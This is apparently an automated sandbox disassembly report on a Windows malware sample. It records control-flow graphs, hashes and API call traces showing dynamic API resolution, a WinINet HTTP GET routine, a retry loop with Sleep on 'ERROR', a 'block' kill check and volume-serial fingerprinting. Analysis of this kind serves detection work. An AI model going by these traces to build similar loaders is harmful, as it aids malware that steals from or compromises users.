                                          • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                          • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                          APIs
                                          • GetProcAddress.KERNEL32(75900000,00764948), ref: 00419C2D
                                          • GetProcAddress.KERNEL32(75900000,00764968), ref: 00419C45
                                          • GetProcAddress.KERNEL32(75900000,00792D10), ref: 00419C5E
                                          • GetProcAddress.KERNEL32(75900000,00792CC8), ref: 00419C76
                                          • GetProcAddress.KERNEL32(75900000,00792D28), ref: 00419C8E
                                          • GetProcAddress.KERNEL32(75900000,00792CF8), ref: 00419CA7
                                          • GetProcAddress.KERNEL32(75900000,00795078), ref: 00419CBF
                                          • GetProcAddress.KERNEL32(75900000,00792D58), ref: 00419CD7
                                          • GetProcAddress.KERNEL32(75900000,00792D70), ref: 00419CF0
                                          • GetProcAddress.KERNEL32(75900000,00792CE0), ref: 00419D08
                                          • GetProcAddress.KERNEL32(75900000,00792D88), ref: 00419D20
                                          • GetProcAddress.KERNEL32(75900000,00764728), ref: 00419D39
                                          • GetProcAddress.KERNEL32(75900000,00764A68), ref: 00419D51
                                          • GetProcAddress.KERNEL32(75900000,00764768), ref: 00419D69
                                          • GetProcAddress.KERNEL32(75900000,00764788), ref: 00419D82
                                          • GetProcAddress.KERNEL32(75900000,00799220), ref: 00419D9A
                                          • GetProcAddress.KERNEL32(75900000,007991C0), ref: 00419DB2
                                          • GetProcAddress.KERNEL32(75900000,00794DF8), ref: 00419DCB
                                          • GetProcAddress.KERNEL32(75900000,00764808), ref: 00419DE3
                                          • GetProcAddress.KERNEL32(75900000,007991D8), ref: 00419DFB
                                          • GetProcAddress.KERNEL32(75900000,007991F0), ref: 00419E14
                                          • GetProcAddress.KERNEL32(75900000,00799250), ref: 00419E2C
                                          • GetProcAddress.KERNEL32(75900000,00799208), ref: 00419E44
                                          • GetProcAddress.KERNEL32(75900000,00764828), ref: 00419E5D
                                          • GetProcAddress.KERNEL32(75900000,00799238), ref: 00419E75
                                          • GetProcAddress.KERNEL32(75900000,00799190), ref: 00419E8D
                                          • GetProcAddress.KERNEL32(75900000,007991A8), ref: 00419EA6
                                          • GetProcAddress.KERNEL32(75900000,00798ED8), ref: 00419EBE
                                          • GetProcAddress.KERNEL32(75900000,00798FE0), ref: 00419ED6
                                          • GetProcAddress.KERNEL32(75900000,00799028), ref: 00419EEF
                                          • GetProcAddress.KERNEL32(75900000,00798EA8), ref: 00419F07
                                          • GetProcAddress.KERNEL32(75900000,00799130), ref: 00419F1F
                                          • GetProcAddress.KERNEL32(75900000,00798FB0), ref: 00419F38
                                          • GetProcAddress.KERNEL32(75900000,007949E8), ref: 00419F50
                                          • GetProcAddress.KERNEL32(75900000,00799070), ref: 00419F68
                                          • GetProcAddress.KERNEL32(75900000,00799040), ref: 00419F81
                                          • GetProcAddress.KERNEL32(75900000,00764848), ref: 00419F99
                                          • GetProcAddress.KERNEL32(75900000,007990D0), ref: 00419FB1
                                          • GetProcAddress.KERNEL32(75900000,00764868), ref: 00419FCA
                                          • GetProcAddress.KERNEL32(75900000,00799058), ref: 00419FE2
                                          • GetProcAddress.KERNEL32(75900000,00798F68), ref: 00419FFA
                                          • GetProcAddress.KERNEL32(75900000,00764888), ref: 0041A013
                                          • GetProcAddress.KERNEL32(75900000,00764528), ref: 0041A02B
                                          • LoadLibraryA.KERNEL32(00799088,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                          • LoadLibraryA.KERNEL32(00799178,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                          • LoadLibraryA.KERNEL32(00798EF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                          • LoadLibraryA.KERNEL32(007990B8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                          • LoadLibraryA.KERNEL32(00799010,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                          • LoadLibraryA.KERNEL32(007990A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                          • LoadLibraryA.KERNEL32(00798F98,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                          • LoadLibraryA.KERNEL32(007990E8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                          • GetProcAddress.KERNEL32(75FD0000,00764548), ref: 0041A0DA
                                          • GetProcAddress.KERNEL32(75FD0000,00799100), ref: 0041A0F2
                                          • GetProcAddress.KERNEL32(75FD0000,00792E50), ref: 0041A10A
                                          • GetProcAddress.KERNEL32(75FD0000,00798F08), ref: 0041A123
                                          • GetProcAddress.KERNEL32(75FD0000,00764568), ref: 0041A13B
                                          • GetProcAddress.KERNEL32(734B0000,00794E98), ref: 0041A160
                                          • GetProcAddress.KERNEL32(734B0000,00764388), ref: 0041A179
                                          • GetProcAddress.KERNEL32(734B0000,00794E20), ref: 0041A191
                                          • GetProcAddress.KERNEL32(734B0000,00799118), ref: 0041A1A9
                                          • GetProcAddress.KERNEL32(734B0000,00798FC8), ref: 0041A1C2
                                          • GetProcAddress.KERNEL32(734B0000,007645A8), ref: 0041A1DA
                                          • GetProcAddress.KERNEL32(734B0000,007642E8), ref: 0041A1F2
                                          • GetProcAddress.KERNEL32(734B0000,00798F50), ref: 0041A20B
                                          • GetProcAddress.KERNEL32(763B0000,007642C8), ref: 0041A22C
                                          • GetProcAddress.KERNEL32(763B0000,00764588), ref: 0041A244
                                          • GetProcAddress.KERNEL32(763B0000,00798E90), ref: 0041A25D
                                          • GetProcAddress.KERNEL32(763B0000,00798EC0), ref: 0041A275
                                          • GetProcAddress.KERNEL32(763B0000,00764308), ref: 0041A28D
                                          • GetProcAddress.KERNEL32(750F0000,00794D08), ref: 0041A2B3
                                          • GetProcAddress.KERNEL32(750F0000,007950A0), ref: 0041A2CB
                                          • GetProcAddress.KERNEL32(750F0000,00798F80), ref: 0041A2E3
                                          • GetProcAddress.KERNEL32(750F0000,007644A8), ref: 0041A2FC
                                          • GetProcAddress.KERNEL32(750F0000,007645E8), ref: 0041A314
                                          • GetProcAddress.KERNEL32(750F0000,00794F60), ref: 0041A32C
                                          • GetProcAddress.KERNEL32(75A50000,00798FF8), ref: 0041A352
                                          • GetProcAddress.KERNEL32(75A50000,007644E8), ref: 0041A36A
                                          • GetProcAddress.KERNEL32(75A50000,00792EF0), ref: 0041A382
                                          • GetProcAddress.KERNEL32(75A50000,00799148), ref: 0041A39B
                                          • GetProcAddress.KERNEL32(75A50000,00799160), ref: 0041A3B3
                                          • GetProcAddress.KERNEL32(75A50000,00764488), ref: 0041A3CB
                                          • GetProcAddress.KERNEL32(75A50000,00764328), ref: 0041A3E4
                                          • GetProcAddress.KERNEL32(75A50000,00798F20), ref: 0041A3FC
                                          • GetProcAddress.KERNEL32(75A50000,00798F38), ref: 0041A414
                                          • GetProcAddress.KERNEL32(75070000,007643A8), ref: 0041A436
                                          • GetProcAddress.KERNEL32(75070000,007992F8), ref: 0041A44E
                                          • GetProcAddress.KERNEL32(75070000,007993A0), ref: 0041A466
                                          • GetProcAddress.KERNEL32(75070000,00799310), ref: 0041A47F
                                          • GetProcAddress.KERNEL32(75070000,00799328), ref: 0041A497
                                          • GetProcAddress.KERNEL32(74E50000,007644C8), ref: 0041A4B8
                                          • GetProcAddress.KERNEL32(74E50000,00764448), ref: 0041A4D1
                                          • GetProcAddress.KERNEL32(75320000,00764468), ref: 0041A4F2
                                          • GetProcAddress.KERNEL32(75320000,00799430), ref: 0041A50A
                                          • GetProcAddress.KERNEL32(6F070000,00764508), ref: 0041A530
                                          • GetProcAddress.KERNEL32(6F070000,00764608), ref: 0041A548
                                          • GetProcAddress.KERNEL32(6F070000,00764348), ref: 0041A560
                                          • GetProcAddress.KERNEL32(6F070000,007994F0), ref: 0041A579
                                          • GetProcAddress.KERNEL32(6F070000,00764628), ref: 0041A591
                                          • GetProcAddress.KERNEL32(6F070000,007645C8), ref: 0041A5A9
                                          • GetProcAddress.KERNEL32(6F070000,00764368), ref: 0041A5C2
                                          • GetProcAddress.KERNEL32(6F070000,00764648), ref: 0041A5DA
                                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                          • GetProcAddress.KERNEL32(74E00000,00799340), ref: 0041A629
                                          • GetProcAddress.KERNEL32(74E00000,00792F30), ref: 0041A641
                                          • GetProcAddress.KERNEL32(74E00000,00799508), ref: 0041A659
                                          • GetProcAddress.KERNEL32(74E00000,00799358), ref: 0041A672
                                          • GetProcAddress.KERNEL32(74DF0000,00764668), ref: 0041A693
                                          • GetProcAddress.KERNEL32(6FA90000,00799370), ref: 0041A6B4
                                          • GetProcAddress.KERNEL32(6FA90000,00764688), ref: 0041A6CD
                                          • GetProcAddress.KERNEL32(6FA90000,00799388), ref: 0041A6E5
                                          • GetProcAddress.KERNEL32(6FA90000,007992B0), ref: 0041A6FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: Ny$(-y$(Cv$(Ev$(Fv$(Gv$(Hv$0/y$HCv$HDv$HEv$HFv$HHv$HIv$HttpQueryInfoA$InternetSetOptionA$P.y$X-y$`Oy$hCv$hDv$hEv$hFv$hGv$hHv$hIv$hJv$p-y$xPy$,y$Bv$Dv$Ev$Iy
                                          • API String ID: 2238633743-325470272
                                          • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                          • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                          • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                          • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1001 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1017 41557c-415583 1001->1017 1018 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1017->1018 1019 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1017->1019 1035 4155bb-4155d2 call 41a8a0 call 41a800 1018->1035 1045 415693-4156a9 call 41aad0 StrCmpCA 1019->1045 1049 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1019->1049 1035->1045 1050 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1045->1050 1051 4156af-4156b6 1045->1051 1049->1045 1181 415ac3-415ac6 1050->1181 1055 4157da-41585f call 41aad0 StrCmpCA 1051->1055 1056 4156bc-4156c3 1051->1056 1075 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1055->1075 1076 415865-41586c 1055->1076 1060 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1056->1060 1061 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1056->1061 1060->1055 1061->1055 1161 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1061->1161 1075->1181 1082 415872-415879 1076->1082 1083 41598f-415a14 call 41aad0 StrCmpCA 1076->1083 1090 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1082->1090 1091 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1082->1091 1112 415a16-415a21 Sleep 1083->1112 1113 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1083->1113 1090->1083 1186 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1090->1186 1091->1083 1112->1017 1113->1181 1161->1055 1186->1083
                                          APIs
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                            • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                            • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                          • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleepstrtok
                                          • String ID: 0.y$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$`.y$p.y
                                          • API String ID: 3630751533-2488558467
                                          • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                          • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                          • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                          • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1212 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1219 406314-406318 1212->1219 1220 40630d 1212->1220 1221 406509-406525 call 41a7a0 call 41a800 * 2 1219->1221 1222 40631e-406342 InternetConnectA 1219->1222 1220->1219 1241 406528-40652d 1221->1241 1224 406348-40634c 1222->1224 1225 4064ff-406503 InternetCloseHandle 1222->1225 1227 40635a 1224->1227 1228 40634e-406358 1224->1228 1225->1221 1230 406364-406392 HttpOpenRequestA 1227->1230 1228->1230 1232 4064f5-4064f9 InternetCloseHandle 1230->1232 1233 406398-40639c 1230->1233 1232->1225 1235 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1233->1235 1236 40639e-4063bf InternetSetOptionA 1233->1236 1237 406407-406427 call 41a740 call 41a800 * 2 1235->1237 1238 40642c-40644b call 418940 1235->1238 1236->1235 1237->1241 1246 4064c9-4064e9 call 41a740 call 41a800 * 2 1238->1246 1247 40644d-406454 1238->1247 1246->1241 1250 406456-406480 InternetReadFile 1247->1250 1251 4064c7-4064ef InternetCloseHandle 1247->1251 1255 406482-406489 1250->1255 1256 40648b 1250->1256 1251->1232 1255->1256 1259 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1255->1259 1256->1251 1259->1250
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                          • StrCmpCA.SHLWAPI(?,0079B138), ref: 00406303
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                          • HttpOpenRequestA.WININET(00000000,GET,?,0079ABA0,00000000,00000000,00400100,00000000), ref: 00406385
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                          • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                          • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                          • InternetCloseHandle.WININET(00000000), ref: 00406503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID: ERROR$ERROR$GET
                                          • API String ID: 3074848878-2509457195
                                          • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                          • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                          • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                          • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1269 4117a0-4117cd call 41aad0 StrCmpCA 1272 4117d7-4117f1 call 41aad0 strtok_s 1269->1272 1273 4117cf-4117d1 ExitProcess 1269->1273 1276 4117f4-4117f8 1272->1276 1277 4119c2-4119cd call 41a800 1276->1277 1278 4117fe-411811 1276->1278 1280 411817-41181a 1278->1280 1281 41199e-4119bd strtok_s 1278->1281 1283 411821-411830 call 41a820 1280->1283 1284 411849-411858 call 41a820 1280->1284 1285 4118ad-4118be StrCmpCA 1280->1285 1286 4118cf-4118e0 StrCmpCA 1280->1286 1287 41198f-411999 call 41a820 1280->1287 1288 4118f1-411902 StrCmpCA 1280->1288 1289 411951-411962 StrCmpCA 1280->1289 1290 411970-411981 StrCmpCA 1280->1290 1291 411913-411924 StrCmpCA 1280->1291 1292 411932-411943 StrCmpCA 1280->1292 1293 411835-411844 call 41a820 1280->1293 1294 41185d-41186e StrCmpCA 1280->1294 1295 41187f-411890 StrCmpCA 1280->1295 1281->1276 1283->1281 1284->1281 1303 4118c0-4118c3 1285->1303 1304 4118ca 1285->1304 1305 4118e2-4118e5 1286->1305 1306 4118ec 1286->1306 1287->1281 1307 411904-411907 1288->1307 1308 41190e 1288->1308 1313 411964-411967 1289->1313 1314 41196e 1289->1314 1316 411983-411986 1290->1316 1317 41198d 1290->1317 1309 411930 1291->1309 1310 411926-411929 1291->1310 1311 411945-411948 1292->1311 1312 41194f 1292->1312 1293->1281 1299 411870-411873 1294->1299 1300 41187a 1294->1300 1301 411892-41189c 1295->1301 1302 41189e-4118a1 1295->1302 1299->1300 1300->1281 1320 4118a8 1301->1320 1302->1320 1303->1304 1304->1281 1305->1306 1306->1281 1307->1308 1308->1281 1309->1281 1310->1309 1311->1312 1312->1281 1313->1314 1314->1281 1316->1317 1317->1281 1320->1281
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID: block
                                          • API String ID: 3407564107-2199623458
                                          • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                          • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                          • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                          • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                          • wsprintfA.USER32 ref: 00417640
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\
                                          • API String ID: 3790021787-3809124531
                                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767E58), ref: 004198A1
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767F18), ref: 004198BA
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767E88), ref: 004198D2
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767ED0), ref: 004198EA
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767EA0), ref: 00419903
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00764E20), ref: 0041991B
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007648E8), ref: 00419933
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00764928), ref: 0041994C
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767EE8), ref: 00419964
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00767E70), ref: 0041997C
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00792B48), ref: 00419995
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00792C68), ref: 004199AD
